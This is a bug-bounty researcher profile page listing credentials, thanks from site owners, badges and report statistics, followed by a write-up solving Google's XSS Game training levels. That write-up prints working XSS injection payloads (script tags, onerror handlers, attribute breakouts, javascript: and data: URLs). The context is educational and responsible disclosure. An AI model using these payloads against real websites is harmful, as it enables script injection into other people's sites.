0xrocky
Top VIP Security Researcher of the Month | Security Researcher Profile
Security researcher 0xrocky has already helped fix 2469 vulnerabilities.
Researcher reputation: 190
Real name:
Michele Corrias
About me:
I got both my M.Sc. degree and B.Sc. degree in Computer Science at University of Milan (UniMi), in Italy, both with a final grade of 110/110 cum laude.
I'm a proud member of LaSER computer security lab!
Please, if you think that I have contributed to the security of your web application with my work, I would be grateful if you would like to give me a positive feedback or a recommendation here: it would help me to grow up professionally!
Contact email:
mhl [dot] crr [at] gmail [dot] com
Alternative Contacts:
< LinkedIn
< Twitter
Certifications & Diplomas:
> M.Sc. Degree in Computer Science
> B.Sc. Degree in Computer Science
> High School Diploma
Experience in Application Security
3-5 years
Award / Bug Bounty I prefer:
A thanksgiving and a public recommendation in my researcher profile will be really appreciated but if you would like I'm also open to:
- donations/vouchers
- swag (cups...)
- kudos
- hall of fame
Halls of Fame:
* Fastweb
* Virgilio (Italiaonline)
* Ryanair
* OpenBugBounty: TOP-50 Researchers All Time & TOP-50 Researchers Last Month
Ethics and Rules:
Michele Corrias is required to abide by the ethics and rules of the Open Bug Bounty project. If you reasonably believe that rules are not respected, please report this to us.
Recommendations and Acknowledgements


Thanks a lot 0xrocky for identifying the vulnerabilities XSS and informed us quickly. He has also checked our fix after release in production. Great security researcher and passionate to work with. Great good work! |


Michele is a real security researcher! He helped us increase the web security of our web application: thanks to him we feel safer now! |


Thanks a lot 0xrocky for identifying the vulnerabilities and alert us. Great security researcher to work with. Keep up the good work! |


Many thanks to @0xrocky for identifying and responsibly disclosing a potential vulnerability on our site! |


Many thanks to 0xrocky for finding a vulnerability on our website! |


Thanks 0xrocky for identifying an XSS vulnerability and for letting us know and helping solve it. His collaboration was fundamental to solving our problems. Great security researcher to work with. Keep up the good work! |


Thank you 0xrocky for identifying a vulnerability and making us aware of it. Great security researcher to work with. Keep up the good work! |


A kudos to 0xrocky for his professional work in not using the identified vulnerabilities and alerting us |


Thanks to 0xrocky for identifying the vulnerability. Now we patched the vulnerability. |


Big thanks to 0xrocky for identifying and responsibly disclosing a vulnerability on our site! |
Honor Badges
Number of Secured Websites
![]() |
![]() |
![]() |
![]() |
10+ Websites
|
50+ Websites
|
500+ Websites
|
WEB SECURITY VETERAN
1000+ Websites
|
Advanced Security Research
![]() |
![]() |
![]() |
![]() |
WAF Bypasser
|
CSRF Master
30+ Reports
|
AppSec Logic Master
30+ Reports
|
Fastest Fix
Fix in 24 hours
|
Outstanding Achievements
![]() |
![]() |
![]() |
|
Secured OBB
|
OBB Advocate
|
Improved OBB
|
Commitment to Remediate and Patch
![]() |
![]() |
![]() |
|
Patch Master
55% Patched
|
Patch Guru
65% Patched
|
Patch Lord
75% Patched
|
Recommendations and Recognition
![]() |
![]() |
![]() |
|
REPUTABLE
10+ Recommends
|
FAMOUS
25+ Recommends
|
GLOBALLY TRUSTED
50+ Recommends
|
Distinguished Blog Author
![]() |
![]() |
![]() |
|
1 Post
|
3 Posts
|
5+ Posts
|
Research Statistics
Total reports: | 3713 |
Total reports on VIP sites: | 166 |
Total patched vulnerabilities: | 2469 |
Recommendations received: | 10 |
Active since: | 19.07.2019 |
Top Security Researcher Awards: | ![]() |
Top VIP Security Researcher Awards: | ![]() |
Reported Vulnerabilities
All Submissions VIP SubmissionsFeatured Submissions
Domain | Reported | Status | Type |
---|
25.05.2021 Google XSS Game
Level #1: Hello, world of XSS
https://xss-game.appspot.com/level1
Solution: <script>alert('xss')</script>
hint: inspect the source code of the page
Level #2: Persistence is key
https://xss-game.appspot.com/level2
Solution: <img src=x onerror=alert('XSS')>
hint: "welcome" post contains HTML
Level #3: That sinking feeling…
https://xss-game.appspot.com/level3/frame#1
Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>
Level #4: Context matters
https://xss-game.appspot.com/level4/frame
Solution: timer=');alert('xss
Level #5: Breaking protocol
https://xss-game.appspot.com/level5/frame
Solution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')
Level #6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
Solution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')
10.02.2020 Stored XSS on h2biz.net
17.10.2019 Stored XSS
I navigated this website: https://www.edilportale.com, an Italian web portal on construction. I found out that it was vulnerable to reflected XSS, as seen in the image.

Please login via Twitter to add a recommendation